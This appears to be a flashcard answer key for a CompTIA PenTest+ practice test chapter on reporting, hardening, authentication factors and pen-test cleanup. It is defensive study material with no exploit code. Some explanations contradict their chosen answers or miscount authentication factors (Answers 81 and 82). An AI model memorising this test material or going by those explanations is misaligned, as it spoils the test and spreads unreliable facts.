The chage command can be used on Linux systems to automatically lock user accounts after a certain time. This prevents stale user accounts from being used by an attacker or disgruntled former employee to gain unauthorized access.

Answer 68

A

A.Store passwords using reversible encryption

Explanation:
The “Store passwords using reversible encryption” policy is highly insecure. It is included in modern deployments to provide backward compatibility with older applications. A client who has this policy turned on should be advised of the security consequences and to consider upgrading to newer applications that don’t require it.

Answer 69

A

B.Rewrite the application to encrypt passwords before they are saved in the database.

Explanation:
Because the application was developed in-house, the client should be able to rewrite the code such that passwords are encrypted by the application before they are saved in the database.

Answer 70

A

A.chage

Explanation:
The chage command can be used on Linux systems to configure password aging for user accounts. For example, it can be used to lock a user account if the user doesn’t change their password after a certain number of days.

Answer 71

A

C.A rainbow table

Explanation:
A rainbow table is a precomputed table of hash values that can be used to reverse hash functions. For example, if a plaintext password has been protected by hashing it, you may be able to use a rainbow table to reverse the hashing function and expose the original plaintext password.

Answer 72

A

A.Salting

Explanation:
Salting the hash involves adding extra, random data to a hashing operation. This mechanism is commonly used to protect hashed passwords from being reverse-hashed (which would expose the plain text password).

Answer 73

A

B.Key stretching

Explanation:
Key stretching involves running the value to be hashed through the hash function multiple times. This increases the computation time required to hash each password, but it also dramatically increases the size of rainbow table needed for a precomputation attack to work.

Answer 74

A

C.Fingerprint scan.

Explanation:
A username and a password are both examples of something you know and therefore do not constitute multifactor authentication. A fingerprint scan is an example of something you are. Requiring a fingerprint scan would improve the security of the system because authentication factors from multiple categories would be required for users to log on.

Answer 75

A

A.PIN

Explanation:
A PIN is an example of something you know.

Answer 76

A

C.Retina scan

Explanation:
A retina scan is an example of something you are. Theoretically, no two people should have identical attributes for this type of factor.

Answer 77

A

C.Hardwire connection to the organization’s internal LAN

Explanation:
A hardwire connection to an organization’s internal LAN is an example of somewhere you are. Authentication may or may not be allowed based on this factor.

Answer 78

A

A.RFID proximity reader

Explanation:
An RFID proximity reader can be used to prevent a user from authenticating to a system unless they are physically present at the system.

Answer 79

A

C.Biometric scan + PIN

Explanation:
Requiring a user to supply a biometric scan (something you are) along with a PIN (something you know) constitutes multifactor authentication.

Answer 80

A

B.password + security token generator

Explanation:
Requiring a user to supply a password (something you know) plus a security token generator (something you have) constitutes multifactor authentication.

Answer 81

A

D.PIN + fingerprint scan + security token

Explanation:
Two-factor authentication (2FA) requires users to supply factors from two different categories. In this case, requiring a user to supply a username (something you know), a PIN (something you know), and a facial recognition scan (something you are) constitutes 2FA authentication.

Answer 82

A

B.Username + PIN + fingerprint scan + one-time password (OTP)

Explanation:
Three-factor authentication (3FA) requires users to supply factors from three different categories. In this case, requiring a user to supply a username (something you know), a PIN (something you know), a fingerprint scan (something you are), and a one-time password (something you have) constitutes 3FA authentication.

Answer 83

A

A.Rewrite the code to sanitize user input.

Explanation:
In this scenario, you could recommend that the application be rewritten such that all user inputs are sanitized before being submitted to the backend database. For example, suppose the application contains a field where users are supposed to enter their phone number. The programmers could validate that the information entered contains only numbers (and only the correct number for a phone number). This prevents malicious attackers from submitting SQL statements into these fields that could potentially expose the information in the database.

Answer 84

A

A.Escape data.

Explanation:
In this scenario, you could recommend that the application be rewritten such that data is escaped. Escaping is the process of securing data by stripping out unwanted information, such as malformed HTML or script tags. This prevents data from being seen as code. Escaping data helps secure information prior to rendering it for the end user and helps prevent SQL injection as well as cross-site scripting attacks.

Answer 85

A

C.Parameterizing queries

Explanation:
Using parameterized queries is typically considered a better defense against SQL injection attacks than sanitizing user input. With parameterized queries, prepared statements are used with bounded variables to access the SQL database.

Answer 86

A

A.Uninstall all unnecessary services from the server.

Explanation:
Every network service enabled on a server expands that server’s attack surface. Therefore, only those services that are actually needed should be installed. In this scenario, a web server probably doesn’t need DNS, DHCP, printing, or email services running. These should be removed.

Answer 87

A

B.Hyper-V
D.Active Directory Federation Services

Explanation:
Every network service enabled on a server expands that server’s attack surface. Therefore, only those services that are actually needed should be installed. In this scenario, the domain controller shouldn’t be running Hyper-V, which is used for virtualization. Likewise, Federation Services is used only in situations where one Active Directory domain is linked to (“federated”) with a different Active Directory domain.

Answer 88

A

A.Use Group Policy to configure account lockout.
E.Delete or disable all unused user accounts.

Explanation:
To harden user accounts on Windows-based computer systems, you should use Group Policy to configure account lockout. This will help slow down or even prevent brute-force or password guessing attacks. You should also immediately disable or delete all unused user accounts.

Answer 89

A

B.Use Group Policy to enforce password complexity requirements.
D.Use Group Policy to enforce password aging requirements.

Explanation:
To harden user accounts on a Windows-based computer system, you should use Group Policy to enforce password complexity requirements. For example, you could require a certain password length and that it contain specific character combinations. You should also use Group Policy to enforce password aging requirements. This requires users to change their passwords on a regular basis.

Answer 90

A

E.Restrict network access to only authenticated users.

Explanation:
To harden network communications on a Windows-based computer system, you should restrict access to the computer over the network access to only authenticated users.

Answer 91

A

A.Close all ports in the Windows firewall and then open only those needed by installed services.

Explanation:
To harden network communications on a Windows-based computer system, you should configure the Windows firewall properly. First, you should close all ports to ensure that nothing is accidentally left open. Then open ports for only those services that have been installed and are needed on the system.

Answer 92

A

A.Install extra system RAM and then disable the Windows paging file.
C.Disable unneeded services.

Explanation:
To harden a Windows-based computer system, you should consider installing extra system RAM and then disable the Windows paging file. This prevents sensitive data that is supposed to be stored only in unencrypted format in RAM from being written to the hard disk page file. You should also disable any unneeded services.

Answer 93

A

D.Disable autorun.

Explanation:
To harden a Windows-based computer system, you should disable autorun. This helps prevent malware from being installed on the system when an infected optical disc or USB drive is inserted into the system.

Answer 94

A

A.Enable and configure iptables.

Explanation:
To harden a Linux-based server system, you should make sure a host-based firewall is running by enabling and configuring iptables. You should first close all network ports in the firewall and then open only those required by specific services running on the system.

Answer 95

A

B.Enable the secure shell (SSH) service.

Explanation:
To harden a Linux-based server system, you should make sure you use SSH instead of Telnet for remote access to the system.

SSH encrypts all network traffic between the SSH server and the SSH client.

Telnet, on the other hand, transmits all data as clear text, including authentication credentials

Answer 96

A

A.netstat

Explanation:
To harden a server system, you should make sure only the services and applications necessary for its role are installed. The netstat command can be used to check for listening network ports on the system. This will reveal which services are running on the system.

Answer 97

A

B./etc/shadow

Explanation:
To harden a server system, you should make sure all user accounts have a password assigned to them. One way to do this is to review the /etc/shadow file and look for any accounts that don’t have a password assigned.

Answer 98

A

D.passwd

Explanation:
To harden a server system, you should make sure all stale user accounts are disabled or deleted. In this scenario, the client doesn’t want to delete the accounts because the temporary or contract users may be coming back in the future. To lock an account manually, you can use the passwd –l command followed by the name of the user.

Answer 99

A

C.Reconfigure the system to send log entries to a dedicated log server.

Explanation:
One way to harden a server system is to reconfigure it to save its log entries to a dedicated logging server somewhere else on the network. This makes it harder for an attacker to cover his or her tracks after a compromise because the log files aren’t stored locally.

Answer 100

A

A.Use FTPS for file transfers.

Explanation:
The FTP protocol does not encrypt data transfers between systems. This means authentication information as well as the data itself are exposed during transmission over the network. To remedy this, you should recommend that the client switch to FTPS instead of FTP. The FTPS protocol uses SSL or TLS to encrypt an FTP session since they encrypt data.

Answer 101

A

D.Use SSH for remote server access.

Explanation:
The Telnet protocol does not use encryption to protect network transmissions, which means authentication credentials to the remote system as well as the data being transferred are sent as plain text. To remedy this, you should recommend that the client use the Secure Shell (SSH) server and client for remote server access. SSH encrypts authentication information as well as data transfers between systems.

Answer 102

A

A.Use the scp command for file transfers.

Explanation:
The rcp utility does not use encryption to protect network transmissions, which means authentication credentials to the remote system as well as the data being transferred are sent as plain text. To remedy this, you should recommend that the client use the scp command to copy files between servers. The scp utility is part of the SSH suite of utilities, which encrypts authentication information as well as data transfers between systems.

Answer 103

A

B.Change the default administrative username and password on the controller.

Explanation:
In this scenario, the wireless network can be hardened by changing the default administrative username and password on the wireless controller. Lists of default usernames and passwords are readily available on the Internet and should not be used.

Answer 104

A

A.Implement MAC address filtering.
B.Implement 802.1x authentication.

Explanation:
In this scenario, the wireless network can be hardened by implementing MAC address filtering. This provides a basic layer of protection by preventing unauthorized systems from connecting to the wireless network. However, MAC addresses are easy to spoof once a known-good address has been identified. So, the wireless network can be further hardened by implementing 802.1x authentication. This eliminates th weakness associated with preshared keys by implementing a separate authentication server (such as a RADIUS server).

Answer 105

A

A.Use directional antennae on all access points.
D.Disable DHCP on the wireless network.

Explanation:
In this scenario, the wireless network can be hardened by using directional access points. This will help prevent the signal from emanating into the parking lot. In addition, DHCP should be disabled on the wireless network. While this makes administration much more difficult, it also prevents attackers who compromise the wireless network from automatically receiving all the configuration information they need to access network resources.

Answer 106

A

B.Run the enable secret command on the router. C.Implement procedures to vet representatives from vendors.

Explanation:
In this scenario, the router can be hardened by creating an encrypted password for privileged access. This is done using the enable secret command on the router. In addition, procedures should be set in place to vet visitors who claim to be representatives of IT vendors.

Answer 107

A

A.Carefully document everything you do as you conduct the test.

Explanation:
After a penetration test, it is critical that you undo everything you have done. The best way to accomplish this is to carefully document everything you do as you conduct the test. That way, you will have a record of what must be restored and how it should look after the cleanup is complete.

Answer 108

A

A.Remove any shell sessions created during the test.
C.Document everything you do during the cleanup.

Explanation:
After a penetration test, it is critical that you undo everything you have done. For example, if you set up any shell sessions, especially reverse shells, you need to make sure that they are removed. In addition, you should document everything you do as you clean up after the test. It’s always possible that you may inadvertently break something during the cleanup process. If this happens, having documentation of what you did will be invaluable.

Answer 109

A

B.Remove any tester-created credentials used during the test.

Explanation:
After a penetration test, it is critical that you undo everything you have done. For example, if you created any backdoor user accounts, you should make sure you remove those credentials. You should not leave these in place as they could be used by a real attacker to compromise the system later.

Answer 110

A

A.Remove any tools or utilities you installed during the test.

Explanation:
After a penetration test, it is critical that you undo everything you have done. For example, it is critical that you uninstall any tools or utilities you used to conduct exploits during the test.

Answer 111

A

A.Attestation of findings

After a penetration test, it is critical that you communicate what happened and what was discovered to the client. During the attestation of findings process, you communicate detailed evidence of what you discovered to the client. The client can then use this information to remediate the problems found.

Answer 112

A

C.Client acceptance

Explanation:
After a penetration test is complete, it is common for the tester to ask the client to agree (usually in writing) that the tester has fulfilled the contract that was originally signed with the client. This process is called client acceptance

Answer 113

A

C.Follow-up actions

Explanation:
After a penetration test is complete, it is not uncommon for the client to ask the tester to come back and retest everything to make sure the problems discovered during the test have been remediated. This process is sometimes called follow-up actions

Answer 114

A

A.Document technical exploits that were effective during the test.
C.Identify exploits that were not effective during the test.

Explanation:
After a penetration test is complete, you should meet with your teams and discuss lessons learned. You should identify what went well and what improvements need to be made. For example, you should discuss which exploits worked and which didn’t. You should document best practices for
using those exploits such that you don’t have to relearn them the next time you conduct a penetration test.

Answer 115

A

C.Trivial, because little effort would be required to exploit the findings

Explanation:
The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities. It provides a technique for scoring each vulnerability on a variety of measures. Security analysts often use CVSS ratings to prioritize response actions. Each measure is given a descriptive rating and a numeric score.

Answer 116

A

A.Following an attempted test, the system becomes unavailable.
B.The system shows an indication of prior unauthorized access.

Explanation:
These may be times that call for immediate communication to the client. The following are some common penetration testing communication triggers. Communication triggers should be done upon the completion of the testing phase, a discovery of a critical finding, or the discovery of indicators of a previous compromise. In this scenario, we would want to contact the client if the system becomes unavailable following an attempted test and if the system shows an indication of prior unauthorized access.

Answer 117

A

D.Correct the most critical vulnerability first, even if it means that fixing the other vulnerabilities may take longer to correct.

Explanation:
In this scenario, the client does not have the budget to immediately correct all of the vulnerabilities found. In this case, the best suggestion to tell the client is to correct the most critical vulnerability first and, then when funds become available, fix the other critical vulnerabilities.

Answer 118

A

A.Disable the unneeded services.

Explanation:
In this scenario, since there are several high-numbered ports listening on a public web server. The best recommendation would be to disable unneeded services since the client only uses post 443. The unnecessary services can pose a security risk because they increase the attack surface, providing a potential attacker with additional ways to try to exploit the system.

Answer 119

A

C.Perform system hardening.

Explanation:

System hardening, also known as operating system hardening, helps minimize security vulnerabilities. The purpose of system hardening is to get rid of as many security risks as possible. This is usually done by removing all nonessential software programs and utilities from the computer. The goal of systems hardening by removing unused programs, accounts functions, applications, ports, permissions, access, etc., is that attackers have fewer opportunities to gain access to your network. There are several types of system hardening activities. They include the following:

Application hardening Operating system hardening Server hardening Database hardening Network hardening

Answer 120

A

B.For all logons, require multifactor authentication.
E.Increase minimum password complexity requirements.
G.On every workstation, enable full-disk encryption.

Explanation:
In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be the following: Use multifactor authentication. Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism. Increase minimum password complexity. Complex passwords use different types of characters in unique ways to increase security, making it harder for an attacker to crack. Enable full-disk encryption. Full-disk encryption (FDE) is encryption at the hardware level. FDE works by automatically converting data on a hard drive into a form that cannot be understood by anyone who doesn’t have the key to “undo” the conversion.

Answer 121

A

B.Executive summary

Explanation:
In this scenario, the question states that the penetration tester is writing a report “that outlines the overall level of risk.” Given this statement, the tester will be including this information in the executive summary. The executive summary is the most important section of the report. It should be written in a manner that conveys all of the important conclusions of the report in a clear manner that is written in “layman’s terms.” A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

Answer 122

A

B.Immediately alert the client with details of the findings.

Explanation:
In this scenario, since the penetration tester discovered a critical vulnerability, the tester should immediately alert the client with the details of the findings.

Answer 123

A

A/Block URL redirections.

Explanation:
In this scenario, the attacker was using a redirect. The security analyst should block URL redirections. A URL redirect is a web server function that sends a user from one URL to another. Redirects commonly take the form of an automated redirect that uses one of a series of status codes defined within the HTTP protocol. So, when a web browser attempts to open a URL that has been redirected, a page with a different URL is opened.

Answer 124

A

A.Recommend increased password complexity requirements.
F.Recommend requiring that all employees take security awareness training.
G.Recommend upgrading the cipher suite used for the VPN solution.

Explanation:

In this scenario, the tester should recommend that the client increase their password complexity requirements since the tester was able to crack them by using a dictionary attack. The tester should also recommend that all employees take security awareness training, since it was a member of the IT department who gave up pertinent information when the tester used a phishing technique. The tester should also recommend upgrading the cipher suite that is used for the VPN solution. A cipher suite is a set of algorithms that help secure network connections that uses Transport Layer Security (TLS) or Secure Socket Layer (SSL). The set of algorithms that cipher suites usually contain includes a key exchange algorithm, a bulk encryption algorithm, and a message authentication code (MAC) algorithm.

Answer 125

A

A.Enable HTTP Strict Transport Security (HSTS)

Explanation:
In this scenario, the tester should recommend that the client enable HTTP Strict Transport Security (HSTS). The HSTS response header lets a website tell browsers that it should only be accessed using HTTPS, instead of using HTTP. It is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS.

Answer 126

A

C.The risk tolerance of the client’s organization

Explanation:
In this scenario, it would be important to put the risk tolerance of the client’s organization into the executive summary. Risk tolerance is basically how much risk an organization is willing to take on where their investments are concerned. With any type of investment, there is always risk, but how much risk one is able to withstand is their risk tolerance. This may be different for every organization. You cannot put a set value on risk tolerance.

Answer 127

A

D.The technician should request that management create a request for proposal (RFP) to begin a formal engagement with a professional penetration testing company.

Explanation:
In this scenario, since the testing was performed by an on-staff junior administrator, it may be in the company’s best interest to create a request for proposal (RFP) from a professional penetration testing company to agree with the assessments and to give the company any vulnerability findings. An RFP is a document that solicits proposal, often made through a bidding process.

Answer 128

A

A.Apply a risk rating and how it affects the organization.

Explanation:
In this scenario, it asks what the security analyst should do first. Once the vulnerability has been identified, you need to rate the risk and how it affects your organization. The rating will determine whether it is safe enough to continue with the work or whether you need to adopt additional control measures to reduce or eliminate the risk. The rating depends upon the likelihood of an event occurring and the severity of the vulnerabilities. This is done by figuring out whether the likelihood is Low, Medium, or High and then doing the same for impact. The 0 to 9 scale is split into three parts: 0 to <3 is Low, 3 to <6 is Medium, and 6 to 9 is High.

Answer 129

A

A.During lessons learned

Explanation:
In this scenario, it would be best to revisit this situation during the lessons learned phase. The lessons learned session is the team’s opportunity to get together and discuss the testing process and results without the client present. Team members should freely discuss the test and offer suggestions for improvement. The lessons learned session is a good opportunity to highlight any innovative techniques used during the test that might be used in future engagements.

Answer 130

A

B.Using smart cards and PINs

Explanation:
In this scenario, the best option to tell the client would be by using smart cards and PINs. Multifactor authentication (MFA) is a security system that requires more than one method of authentication from separate categories of credentials to verify the user’s identity for a login or other transaction. The authentication categories are something you know, something you have, and something you are.

Answer 131

A

A.They should disable any unnecessary services.

Explanation:
The best recommendation would be to disable any unneeded services. Unnecessary services can pose a security risk because they increase your client’s network attack surface, providing a potential attacker a number of ways to try to exploit the system. An attack surface is the total sum of the vulnerabilities in a given computing device or network that are accessible to a potential hacker.

Answer 132

A

A.Local Administrator Password Solution (LAPS)

Explanation:
The Local Administrator Password Solution (LAPS) is a Microsoft tool that manages administrative credentials. It is for randomizing local administrator account credentials using Active Directory. Limited Administrator Password Assistance (LAPA) does not exist. Nessus is a vulnerability scanner, and Metasploit is an exploitation framework used to execute and attack networks.

Answer 133

A

D.Include all the technical detail pertaining to the testing.

Explanation:
An executive summary should not contain technical detail. The executive summary is the most important section of the report. It should be written in a manner that conveys all of the important conclusions of the report in a clear manner that is written in layman’s terms. A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

Answer 134

A

B.The removal of any tools used
C.The removal of shells
D.The removal of tester-created credentials

Explanation:
CompTIA highlights three important post-engagement cleanup activities: Removing any shells installed on systems during the penetration test.
Removing any tester-created accounts, credentials, or backdoors that were installed during testing. Removing any tools that were installed during testing. Remediation of vulnerabilities is a follow-on activity and is not conducted as part of the test. The testers should remove any shells or other tools installed during testing as well as remove any accounts or credentials that they created.

Answer 135

A

D.Technology

Explanation:
In this scenario, you are discussing technology. Technological controls also provide effective defenses against many security threats. There are three major categories of remediation activities. The categories are people, process, and technology.

Answer 136

A

B.Something you have

Explanation:
In this scenario, you and your colleague are discussing something you have. Physical objects may be used as authentication mechanisms. Organizations seeking to protect sensitive information and critical resources should implement multifactor authentication. Multifactor authentication implementations combine two or more authentication mechanisms coming from different authentication categories.

Brainscape's Knowledge GenomeTM

Flashcards in “CompTIA PenTest+ Practice Test Chapter 5 Reporting and Communication (Sybex: Panek, Crystal, Tracy)”

Brainscape's Knowledge Genome^TM